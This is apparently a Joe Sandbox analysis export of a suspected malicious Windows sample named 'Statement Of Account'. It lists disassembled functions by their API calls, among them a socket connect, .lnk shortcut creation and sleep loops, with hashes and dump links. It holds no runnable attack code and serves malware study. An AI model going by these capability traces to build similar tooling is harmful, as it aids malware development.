Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$EnableMessageSend$Show
String ID:
API String ID: 476717838-0
Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E

Function 00449549 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0044955A

Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC

SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
_wcslen.LIBCMT ref: 004495C1
_wcslen.LIBCMT ref: 004495CE
SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend_wcslen$_memset_wcspbrk
String ID:
API String ID: 1843234404-0
Opcode ID: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
Instruction ID: 2eba0e6ca7bf2f01d6f4dc0284c8cedbdf4c7ea0b5caad0642d64795040b3bc6
Opcode Fuzzy Hash: b21334e59b332bdcefcacb45badc01962a29afe58654cc2f886ab9dc01dd4065
Instruction Fuzzy Hash: 1821F87260430556E630EB15AC81BFBB3D8EBD0761F10483FEE4081280E67E9959D3AA

Function 00445719 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00445721
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
_wcslen.LIBCMT ref: 004457A3
CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
String ID:
API String ID: 3087257052-0
Opcode ID: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
Opcode Fuzzy Hash: b8615011704e714012d326b35a72e373024cdcb02b0b49a0115346f3c93ca327
Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA

Function 00455080 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

DestroyMenu.USER32(?), ref: 004550EC
DestroyMenu.USER32(?), ref: 00455102
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Destroy$DeleteMenuObject$Cursor
String ID:
API String ID: 1736985952-0
Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59

Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004647A2: inet_addr.WS2_32(?), ref: 004647C7

socket.WS2_32(00000002,00000001,00000006), ref: 00464985
WSAGetLastError.WS2_32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
connect.WS2_32(00000000,00000000,00000010), ref: 004649CD
WSAGetLastError.WS2_32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
closesocket.WS2_32(00000000), ref: 00464A07

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ErrorLast$closesocketconnectinet_addrsocket
String ID:
API String ID: 245547762-0
Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A

Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00447151
ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
SelectObject.GDI32(?,00000000), ref: 004471A2
BeginPath.GDI32(?), ref: 004471B7
SelectObject.GDI32(?,00000000), ref: 004471DC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69

Function 004554B5 Relevance: 7.6, APIs: 5, Instructions: 62windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 004554DF
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DeleteMessageObjectSend$CursorDestroy
String ID:
API String ID: 200077650-0
Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769

Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A

Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 0046FD00
SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
DestroyCursor.USER32(?), ref: 0046FD58
DestroyCursor.USER32(?), ref: 0046FD5F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: MessageSend$CursorDestroy
String ID:
API String ID: 1839592766-0
Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67

Function 004175A2 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004175AE

Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82

__amsg_exit.LIBCMT ref: 004175CE
__lock.LIBCMT ref: 004175DE
InterlockedDecrement.KERNEL32(?), ref: 004175FB
InterlockedIncrement.KERNEL32(00A12D18), ref: 00417626

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
Opcode Fuzzy Hash: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE

Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00460342
GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
MessageBeep.USER32(00000000), ref: 0046036D
KillTimer.USER32(?,0000040A), ref: 00460392
EndDialog.USER32(?,00000001), ref: 004603AB

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55

Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00433172
StrokeAndFillPath.GDI32(?), ref: 0043318A
StrokePath.GDI32(?), ref: 00433193
SelectObject.GDI32(?,00000000), ref: 004331A4
DeleteObject.GDI32(00000000), ref: 004331BA

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD

Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON

Download Yara Rule

Strings

Default, xrefs: 0042EA71
|k, xrefs: 0040AB99

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _malloc
String ID: Default$|k
API String ID: 1579825452-2254895183
Opcode ID: becd5b91230c6b3cce4541e76e7ed3885ca0e1da08972e6e30288734a84e99a9
Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
Opcode Fuzzy Hash: becd5b91230c6b3cce4541e76e7ed3885ca0e1da08972e6e30288734a84e99a9
Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B

Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON

Download Yara Rule

APIs

Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82

CoInitialize.OLE32(00000000), ref: 0046CE18
CoCreateInstance.COMBASE(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
CoUninitialize.COMBASE ref: 0046CE50

Strings

.lnk, xrefs: 0046CDEB, 0046CE08

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6

Function 00469BED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 176396367-557222456
Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B

Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

VariantInit.OLEAUT32(00000000), ref: 0042D2E0
VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
VariantClear.OLEAUT32(00000000), ref: 0042D2FF

Strings

4RH, xrefs: 00409F28

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
